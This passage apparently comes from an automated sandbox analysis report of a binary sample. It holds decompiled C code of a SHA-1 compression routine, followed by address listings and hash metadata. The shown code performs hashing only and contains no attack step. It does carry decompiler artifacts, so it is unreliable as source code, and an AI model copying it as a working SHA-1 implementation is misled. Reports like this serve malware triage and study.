                                                                                                                					_t146 = _t510 + 0x6ed9eba1; // 0x6ed9ebc9
                                                                                                                					_t511 = _t293 + (_t336 ^ _v8 ^ _t427) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x154)) + _t146;
                                                                                                                					_t296 = _v8;
                                                                                                                					_v8 = _t427;
                                                                                                                					_v12 = _t511;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t408 = _v8;
                                                                                                                					_t504 = _t511 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
                                                                                                                					_v16 = _t296;
                                                                                                                					_t280 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v12 = _t504;
                                                                                                                				} while (_t467 < 0x28);
                                                                                                                				_v8 = 0x28;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _t408;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t515 = ((_t361 | _t280) & _t408 | _t361 & _t280) +  *((intOrPtr*)(_t543 + _v8 * 4 - 0x14c)) + _t504 + _v16 - 0x70e44324;
                                                                                                                					_t473 = _v12;
                                                                                                                					_v12 = _t515;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t342 = _v8;
                                                                                                                					asm("ror edi, 0x2");
                                                                                                                					_t436 = ((_t280 | _t473) & _t361 | _t280 & _t473) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x148)) + _t515 + _v16 - 0x70e44324;
                                                                                                                					_v16 = _t361;
                                                                                                                					_t372 = _v12;
                                                                                                                					_v12 = _t436;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_v8 = _t280;
                                                                                                                					_t438 = ((_t473 | _t372) & _t280 | _t473 & _t372) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x144)) + _t436 + _v16 - 0x70e44324;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t300 = _v12;
                                                                                                                					_v8 = _t473;
                                                                                                                					_v12 = _t438;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t527 = ((_t372 | _t300) & _t473 | _t372 & _t300) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x140)) + _t438 + _v16 - 0x70e44324;
                                                                                                                					_v16 = _v8;
                                                                                                                					_t441 = _t372;
                                                                                                                					_t361 = _v12;
                                                                                                                					_v8 = _t441;
                                                                                                                					_v12 = _t527;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t504 = ((_t300 | _t361) & _t441 | _t300 & _t361) +  *((intOrPtr*)(_t543 + _t342 * 4 - 0x13c)) + _t527 + _v16 - 0x70e44324;
                                                                                                                					_t408 = _t300;
                                                                                                                					_t280 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v12 = _t504;
                                                                                                                					_t343 = _t342 + 5;
                                                                                                                					_v8 = _t343;
                                                                                                                				} while (_t343 < 0x3c);
                                                                                                                				_t481 = 0x3c;
                                                                                                                				_v8 = 0x3c;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t482 = _v8;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t530 = (_t408 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t543 + _t481 * 4 - 0x14c)) + _t504 + _v16 - 0x359d3e2a;
                                                                                                                					_t348 = _v12;
                                                                                                                					_v16 = _t408;
                                                                                                                					_v12 = _t530;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_t449 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x148)) + _t530 + _v16 - 0x359d3e2a;
                                                                                                                					_v16 = _t361;
                                                                                                                					_t373 = _v12;
                                                                                                                					_v12 = _t449;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_v16 = _t280;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x144)) + _t449 + _v16 - 0x359d3e2a;
                                                                                                                					_t408 = _v12;
                                                                                                                					_v12 = _t304;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_v16 = _t348;
                                                                                                                					_t537 = (_t348 ^ _t373 ^ _t408) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
                                                                                                                					_t306 = _t373;
                                                                                                                					_v8 = _t348;
                                                                                                                					asm("ror edx, 0x2");
                                                                                                                					_v8 = _t373;
                                                                                                                					_t361 = _v12;
                                                                                                                					_v12 = _t537;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t481 = _t482 + 5;
                                                                                                                					_t504 = (_t306 ^ _t408 ^ _t361) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x13c)) + _t537 + _v16 - 0x359d3e2a;
                                                                                                                					_v16 = _t306;
                                                                                                                					_t280 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v8 = _t408;
                                                                                                                					_v12 = _t504;
                                                                                                                					_v8 = _t481;
                                                                                                                				} while (_t481 < 0x50);
                                                                                                                				_t483 = _a4;
                                                                                                                				_t483[2] = _t483[2] + _t361;
                                                                                                                				_t483[3] = _t483[3] + _t408;
                                                                                                                				_t312 = _t483[4] + _v16;
                                                                                                                				 *_t483 =  *_t483 + _t504;
                                                                                                                				_t483[1] = _t483[1] + _t280;
                                                                                                                				_t483[4] = _t312;
                                                                                                                				_t483[0x17] = 0;
                                                                                                                				return _t312;
                                                                                                                			}
                                                                                                                0x00e5c241
                                                                                                                0x00e5c248
                                                                                                                0x00e5c24b
                                                                                                                0x00e5c24e
                                                                                                                0x00e5c263
                                                                                                                0x00e5c26a
                                                                                                                0x00e5c26d
                                                                                                                0x00e5c271
                                                                                                                0x00e5c274
                                                                                                                0x00e5c279
                                                                                                                0x00e5c27c
                                                                                                                0x00e5c28b
                                                                                                                0x00e5c28e
                                                                                                                0x00e5c295
                                                                                                                0x00e5c298
                                                                                                                0x00e5c29b
                                                                                                                0x00e5c29e
                                                                                                                0x00e5c2a1
                                                                                                                0x00e5c2a9
                                                                                                                0x00e5c2b7
                                                                                                                0x00e5c2ba
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2c4
                                                                                                                0x00e5c2c7
                                                                                                                0x00e5c2ca
                                                                                                                0x00e5c2d2
                                                                                                                0x00e5c2e0
                                                                                                                0x00e5c2e3
                                                                                                                0x00e5c2ea
                                                                                                                0x00e5c2ed
                                                                                                                0x00e5c2f0
                                                                                                                0x00e5c2f3
                                                                                                                0x00e5c2f6
                                                                                                                0x00e5c2ff
                                                                                                                0x00e5c306
                                                                                                                0x00e5c306
                                                                                                                0x00e5c30c
                                                                                                                0x00e5c325
                                                                                                                0x00e5c328
                                                                                                                0x00e5c32f
                                                                                                                0x00e5c332
                                                                                                                0x00e5c335
                                                                                                                0x00e5c347
                                                                                                                0x00e5c351
                                                                                                                0x00e5c354
                                                                                                                0x00e5c35d
                                                                                                                0x00e5c360
                                                                                                                0x00e5c367
                                                                                                                0x00e5c36a
                                                                                                                0x00e5c370
                                                                                                                0x00e5c383
                                                                                                                0x00e5c38a
                                                                                                                0x00e5c38d
                                                                                                                0x00e5c390
                                                                                                                0x00e5c393
                                                                                                                0x00e5c39c
                                                                                                                0x00e5c39f
                                                                                                                0x00e5c3b2
                                                                                                                0x00e5c3b5
                                                                                                                0x00e5c3bf
                                                                                                                0x00e5c3c2
                                                                                                                0x00e5c3c4
                                                                                                                0x00e5c3cd
                                                                                                                0x00e5c3d0
                                                                                                                0x00e5c3e3
                                                                                                                0x00e5c3e9
                                                                                                                0x00e5c3ec
                                                                                                                0x00e5c3f3
                                                                                                                0x00e5c3f5
                                                                                                                0x00e5c3f8
                                                                                                                0x00e5c3fb
                                                                                                                0x00e5c3fe
                                                                                                                0x00e5c401
                                                                                                                0x00e5c404
                                                                                                                0x00e5c40d
                                                                                                                0x00e5c412
                                                                                                                0x00e5c415
                                                                                                                0x00e5c415
                                                                                                                0x00e5c428
                                                                                                                0x00e5c42b
                                                                                                                0x00e5c42e
                                                                                                                0x00e5c435
                                                                                                                0x00e5c438
                                                                                                                0x00e5c43b
                                                                                                                0x00e5c43e
                                                                                                                0x00e5c451
                                                                                                                0x00e5c454
                                                                                                                0x00e5c45f
                                                                                                                0x00e5c462
                                                                                                                0x00e5c46e
                                                                                                                0x00e5c471
                                                                                                                0x00e5c477
                                                                                                                0x00e5c47a
                                                                                                                0x00e5c47d
                                                                                                                0x00e5c484
                                                                                                                0x00e5c494
                                                                                                                0x00e5c497
                                                                                                                0x00e5c49d
                                                                                                                0x00e5c4a0
                                                                                                                0x00e5c4a7
                                                                                                                0x00e5c4a9
                                                                                                                0x00e5c4ac
                                                                                                                0x00e5c4af
                                                                                                                0x00e5c4b2
                                                                                                                0x00e5c4b5
                                                                                                                0x00e5c4bc
                                                                                                                0x00e5c4cb
                                                                                                                0x00e5c4ce
                                                                                                                0x00e5c4d5
                                                                                                                0x00e5c4d8
                                                                                                                0x00e5c4db
                                                                                                                0x00e5c4de
                                                                                                                0x00e5c4e1
                                                                                                                0x00e5c4e4
                                                                                                                0x00e5c4e7
                                                                                                                0x00e5c4f0
                                                                                                                0x00e5c501
                                                                                                                0x00e5c509
                                                                                                                0x00e5c50f
                                                                                                                0x00e5c512
                                                                                                                0x00e5c514
                                                                                                                0x00e5c517
                                                                                                                0x00e5c51a
                                                                                                                0x00e5c527

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 510b793350833397b8132a7666fabf66f8d5f1776480709b71e03841eb83c365
                                                                                                                • Instruction ID: 703666f298eb49c4e6d93881f43f62579da044d5f70e02f220af561600e42823
                                                                                                                • Opcode Fuzzy Hash: 510b793350833397b8132a7666fabf66f8d5f1776480709b71e03841eb83c365
                                                                                                                • Instruction Fuzzy Hash: 5D021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00E5BFE3(signed int* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v304;
                                                                                                                				signed int* _t277;
                                                                                                                				signed int* _t278;
                                                                                                                				signed int _t279;
                                                                                                                				signed int _t285;
                                                                                                                				signed int _t288;
                                                                                                                				signed int _t292;
                                                                                                                				signed int _t295;
                                                                                                                				signed int _t299;
                                                                                                                				signed int _t303;
                                                                                                                				signed int _t305;
                                                                                                                				signed int _t311;
                                                                                                                				signed int _t318;
                                                                                                                				signed int _t320;
                                                                                                                				signed int _t323;
                                                                                                                				signed int _t325;
                                                                                                                				signed int _t334;
                                                                                                                				signed int _t340;
                                                                                                                				signed int _t341;
                                                                                                                				signed int _t346;
                                                                                                                				signed int _t353;
                                                                                                                				signed int _t357;
                                                                                                                				signed int _t358;
                                                                                                                				signed int _t362;
                                                                                                                				signed int _t365;
                                                                                                                				signed int _t369;
                                                                                                                				signed int _t370;
                                                                                                                				signed int _t400;
                                                                                                                				signed int _t405;
                                                                                                                				signed int _t411;
                                                                                                                				signed int _t414;
                                                                                                                				signed int _t421;
                                                                                                                				signed int _t424;
                                                                                                                				signed int _t433;
                                                                                                                				signed int _t435;
                                                                                                                				signed int _t438;
                                                                                                                				signed int _t446;
                                                                                                                				signed int _t448;
                                                                                                                				signed int _t459;
                                                                                                                				signed int _t462;
                                                                                                                				signed int _t463;
                                                                                                                				signed int _t464;
                                                                                                                				signed int _t470;
                                                                                                                				signed int _t478;
                                                                                                                				signed int _t479;
                                                                                                                				signed int* _t480;
                                                                                                                				signed int* _t481;
                                                                                                                				signed int _t488;
                                                                                                                				signed int _t491;
                                                                                                                				signed int _t496;
                                                                                                                				signed int _t499;
                                                                                                                				signed int _t502;
                                                                                                                				signed int _t505;
                                                                                                                				signed int _t506;
                                                                                                                				signed int _t510;
                                                                                                                				signed int _t522;
                                                                                                                				signed int _t525;
                                                                                                                				signed int _t532;
                                                                                                                				void* _t536;
                                                                                                                
                                                                                                                				_t481 = _a4;
                                                                                                                				_t353 = 0;
                                                                                                                				_t2 =  &(_t481[7]); // 0x45
                                                                                                                				_t277 = _t2;
                                                                                                                				do {
                                                                                                                					_push(_t277);
                                                                                                                					 *_t448 =  *_t448 - 1;
                                                                                                                					 *(_t536 + _t353 * 4 - 0x14c) = ((0x00000038 << 0x00000008 | _t448) << 0x00000008 | _t277[0] & 0x000000ff) << 0x00000008 | _t277[0] & 0x000000ff;
                                                                                                                					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[0] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff;
                                                                                                                					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                                                                					_t448 = _t277[3] & 0x000000ff;
                                                                                                                					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[2] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t277[3] & 0x000000ff) << 0x00000008 | _t448;
                                                                                                                					_t353 = _t353 + 4;
                                                                                                                					_t277 =  &(_t277[4]);
                                                                                                                				} while (_t353 < 0x10);
                                                                                                                				_t278 =  &_v304;
                                                                                                                				_v8 = 0x10;
                                                                                                                				do {
                                                                                                                					_t400 =  *(_t278 - 0x18);
                                                                                                                					_t459 =  *(_t278 - 0x14);
                                                                                                                					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t400;
                                                                                                                					asm("rol ecx, 1");
                                                                                                                					asm("rol ebx, 1");
                                                                                                                					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                                                                					_t278[8] = _t357;
                                                                                                                					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                                                                					_t278 =  &(_t278[4]);
                                                                                                                					asm("rol ebx, 1");
                                                                                                                					asm("rol edx, 1");
                                                                                                                					_t46 =  &_v8;
                                                                                                                					 *_t46 = _v8 - 1;
                                                                                                                					_t278[6] = _t318 ^ _t400;
                                                                                                                					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                                                                				} while ( *_t46 != 0);
                                                                                                                				_t320 =  *_t481;
                                                                                                                				_t279 = _t481[1];
                                                                                                                				_t358 = _t481[2];
                                                                                                                				_t405 = _t481[3];
                                                                                                                				_v12 = _t320;
                                                                                                                				_v16 = _t481[4];
                                                                                                                				_v8 = 0;
                                                                                                                				do {
                                                                                                                					asm("rol ebx, 0x5");
                                                                                                                					_t462 = _v8;
                                                                                                                					_t488 = _t320 + ( !_t279 & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                                                                					_t323 = _v12;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_v16 = _t405;
                                                                                                                					_v12 = _t488;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v8 = _t358;
                                                                                                                					_t411 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                					_t491 = _t279;
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t362 = _v12;
                                                                                                                					_v8 = _t323;
                                                                                                                					_t325 = _v8;
                                                                                                                					_v12 = _t411;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_t285 = _t411 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                					_t414 = _v12;
                                                                                                                					_v16 = _t491;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v8 = _t362;
                                                                                                                					_v12 = _t285;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_v16 = _t325;
                                                                                                                					_t496 = _t285 + ( !_t414 & _t325 | _t362 & _t414) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                					_t358 = _v12;
                                                                                                                					_t288 = _v8;
                                                                                                                					asm("ror edx, 0x2");
                                                                                                                					_v8 = _t414;
                                                                                                                					_v12 = _t496;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _t288;
                                                                                                                					_t279 = _v12;
                                                                                                                					_t499 = _t496 + ( !_t358 & _t288 | _t414 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                					_t405 = _v8;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t463 = _t462 + 5;
                                                                                                                					_t320 = _t499;
                                                                                                                					_v12 = _t320;
                                                                                                                					_v8 = _t463;
                                                                                                                				} while (_t463 < 0x14);
                                                                                                                				_t464 = 0x14;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_v16 = _t405;
                                                                                                                					_t502 = _t499 + (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                					_t334 = _v12;
                                                                                                                					_v12 = _t502;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t421 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_t505 = _t279;
                                                                                                                					_v16 = _t358;
                                                                                                                					_t365 = _v12;
                                                                                                                					_v12 = _t421;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t292 = _t421 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                					_t424 = _v12;
                                                                                                                					_v8 = _t334;
                                                                                                                					_v8 = _t365;
                                                                                                                					_v12 = _t292;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_t464 = _t464 + 5;
                                                                                                                					_t358 = _v12;
                                                                                                                					asm("ror edx, 0x2");
                                                                                                                					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9ebc9
                                                                                                                					_t506 = _t292 + (_t334 ^ _v8 ^ _t424) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                                                                					_t295 = _v8;
                                                                                                                					_v8 = _t424;
                                                                                                                					_v12 = _t506;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t405 = _v8;
                                                                                                                					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                                                                					_v16 = _t295;
                                                                                                                					_t279 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v12 = _t499;
                                                                                                                				} while (_t464 < 0x28);
                                                                                                                				_v8 = 0x28;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _t405;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t510 = ((_t358 | _t279) & _t405 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                                                                					_t470 = _v12;
                                                                                                                					_v12 = _t510;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t340 = _v8;
                                                                                                                					asm("ror edi, 0x2");
                                                                                                                					_t433 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                                                                					_v16 = _t358;
                                                                                                                					_t369 = _v12;
                                                                                                                					_v12 = _t433;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_v8 = _t279;
                                                                                                                					_t435 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t433 + _v16 - 0x70e44324;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t299 = _v12;
                                                                                                                					_v8 = _t470;
                                                                                                                					_v12 = _t435;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t435 + _v16 - 0x70e44324;
                                                                                                                					_v16 = _v8;
                                                                                                                					_t438 = _t369;
                                                                                                                					_t358 = _v12;
                                                                                                                					_v8 = _t438;
                                                                                                                					_v12 = _t522;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t499 = ((_t299 | _t358) & _t438 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                                                                					_t405 = _t299;
                                                                                                                					_t279 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v12 = _t499;
                                                                                                                					_t341 = _t340 + 5;
                                                                                                                					_v8 = _t341;
                                                                                                                				} while (_t341 < 0x3c);
                                                                                                                				_t478 = 0x3c;
                                                                                                                				_v8 = 0x3c;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t479 = _v8;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_t525 = (_t405 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                                                                                					_t346 = _v12;
                                                                                                                					_v16 = _t405;
                                                                                                                					_v12 = _t525;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_t446 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                                                                                					_v16 = _t358;
                                                                                                                					_t370 = _v12;
                                                                                                                					_v12 = _t446;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_v16 = _t279;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t446 + _v16 - 0x359d3e2a;
                                                                                                                					_t405 = _v12;
                                                                                                                					_v12 = _t303;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_v16 = _t346;
                                                                                                                					_t532 = (_t346 ^ _t370 ^ _t405) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                                                                					_t305 = _t370;
                                                                                                                					_v8 = _t346;
                                                                                                                					asm("ror edx, 0x2");
                                                                                                                					_v8 = _t370;
                                                                                                                					_t358 = _v12;
                                                                                                                					_v12 = _t532;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t478 = _t479 + 5;
                                                                                                                					_t499 = (_t305 ^ _t405 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                                                                                					_v16 = _t305;
                                                                                                                					_t279 = _v12;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v8 = _t405;
                                                                                                                					_v12 = _t499;
                                                                                                                					_v8 = _t478;
                                                                                                                				} while (_t478 < 0x50);
                                                                                                                				_t480 = _a4;
                                                                                                                				_t480[2] = _t480[2] + _t358;
                                                                                                                				_t480[3] = _t480[3] + _t405;
                                                                                                                				_t311 = _t480[4] + _v16;
                                                                                                                				 *_t480 =  *_t480 + _t499;
                                                                                                                				_t480[1] = _t480[1] + _t279;
                                                                                                                				_t480[4] = _t311;
                                                                                                                				_t480[0x17] = 0;
                                                                                                                				return _t311;
                                                                                                                			}
                                                                                                                0x00e5c13e
                                                                                                                0x00e5c147
                                                                                                                0x00e5c14a
                                                                                                                0x00e5c14d
                                                                                                                0x00e5c165
                                                                                                                0x00e5c16c
                                                                                                                0x00e5c16e
                                                                                                                0x00e5c171
                                                                                                                0x00e5c174
                                                                                                                0x00e5c17d
                                                                                                                0x00e5c184
                                                                                                                0x00e5c187
                                                                                                                0x00e5c18a
                                                                                                                0x00e5c199
                                                                                                                0x00e5c1a0
                                                                                                                0x00e5c1a3
                                                                                                                0x00e5c1a6
                                                                                                                0x00e5c1af
                                                                                                                0x00e5c1b9
                                                                                                                0x00e5c1bc
                                                                                                                0x00e5c1c8
                                                                                                                0x00e5c1cb
                                                                                                                0x00e5c1d2
                                                                                                                0x00e5c1d5
                                                                                                                0x00e5c1d8
                                                                                                                0x00e5c1dd
                                                                                                                0x00e5c1e0
                                                                                                                0x00e5c1e9
                                                                                                                0x00e5c1fa
                                                                                                                0x00e5c1fd
                                                                                                                0x00e5c200
                                                                                                                0x00e5c207
                                                                                                                0x00e5c20a
                                                                                                                0x00e5c20d
                                                                                                                0x00e5c210
                                                                                                                0x00e5c212
                                                                                                                0x00e5c215
                                                                                                                0x00e5c218
                                                                                                                0x00e5c221
                                                                                                                0x00e5c226
                                                                                                                0x00e5c226
                                                                                                                0x00e5c23b
                                                                                                                0x00e5c23e
                                                                                                                0x00e5c241
                                                                                                                0x00e5c248
                                                                                                                0x00e5c24b
                                                                                                                0x00e5c24e
                                                                                                                0x00e5c263
                                                                                                                0x00e5c26a
                                                                                                                0x00e5c26d
                                                                                                                0x00e5c271
                                                                                                                0x00e5c274
                                                                                                                0x00e5c279
                                                                                                                0x00e5c27c
                                                                                                                0x00e5c28b
                                                                                                                0x00e5c28e
                                                                                                                0x00e5c295
                                                                                                                0x00e5c298
                                                                                                                0x00e5c29b
                                                                                                                0x00e5c29e
                                                                                                                0x00e5c2a1
                                                                                                                0x00e5c2a9
                                                                                                                0x00e5c2b7
                                                                                                                0x00e5c2ba
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2bd
                                                                                                                0x00e5c2c4
                                                                                                                0x00e5c2c7
                                                                                                                0x00e5c2ca
                                                                                                                0x00e5c2d2
                                                                                                                0x00e5c2e0
                                                                                                                0x00e5c2e3
                                                                                                                0x00e5c2ea
                                                                                                                0x00e5c2ed
                                                                                                                0x00e5c2f0
                                                                                                                0x00e5c2f3
                                                                                                                0x00e5c2f6
                                                                                                                0x00e5c2ff
                                                                                                                0x00e5c306
                                                                                                                0x00e5c306
                                                                                                                0x00e5c30c
                                                                                                                0x00e5c325
                                                                                                                0x00e5c328
                                                                                                                0x00e5c32f
                                                                                                                0x00e5c332
                                                                                                                0x00e5c335
                                                                                                                0x00e5c347
                                                                                                                0x00e5c351
                                                                                                                0x00e5c354
                                                                                                                0x00e5c35d
                                                                                                                0x00e5c360
                                                                                                                0x00e5c367
                                                                                                                0x00e5c36a
                                                                                                                0x00e5c370
                                                                                                                0x00e5c383
                                                                                                                0x00e5c38a
                                                                                                                0x00e5c38d
                                                                                                                0x00e5c390
                                                                                                                0x00e5c393
                                                                                                                0x00e5c39c
                                                                                                                0x00e5c39f
                                                                                                                0x00e5c3b2
                                                                                                                0x00e5c3b5
                                                                                                                0x00e5c3bf
                                                                                                                0x00e5c3c2
                                                                                                                0x00e5c3c4
                                                                                                                0x00e5c3cd
                                                                                                                0x00e5c3d0
                                                                                                                0x00e5c3e3
                                                                                                                0x00e5c3e9
                                                                                                                0x00e5c3ec
                                                                                                                0x00e5c3f3
                                                                                                                0x00e5c3f5
                                                                                                                0x00e5c3f8
                                                                                                                0x00e5c3fb
                                                                                                                0x00e5c3fe
                                                                                                                0x00e5c401
                                                                                                                0x00e5c404
                                                                                                                0x00e5c40d
                                                                                                                0x00e5c412
                                                                                                                0x00e5c415
                                                                                                                0x00e5c415
                                                                                                                0x00e5c428
                                                                                                                0x00e5c42b
                                                                                                                0x00e5c42e
                                                                                                                0x00e5c435
                                                                                                                0x00e5c438
                                                                                                                0x00e5c43b
                                                                                                                0x00e5c43e
                                                                                                                0x00e5c451
                                                                                                                0x00e5c454
                                                                                                                0x00e5c45f
                                                                                                                0x00e5c462
                                                                                                                0x00e5c46e
                                                                                                                0x00e5c471
                                                                                                                0x00e5c477
                                                                                                                0x00e5c47a
                                                                                                                0x00e5c47d
                                                                                                                0x00e5c484
                                                                                                                0x00e5c494
                                                                                                                0x00e5c497
                                                                                                                0x00e5c49d
                                                                                                                0x00e5c4a0
                                                                                                                0x00e5c4a7
                                                                                                                0x00e5c4a9
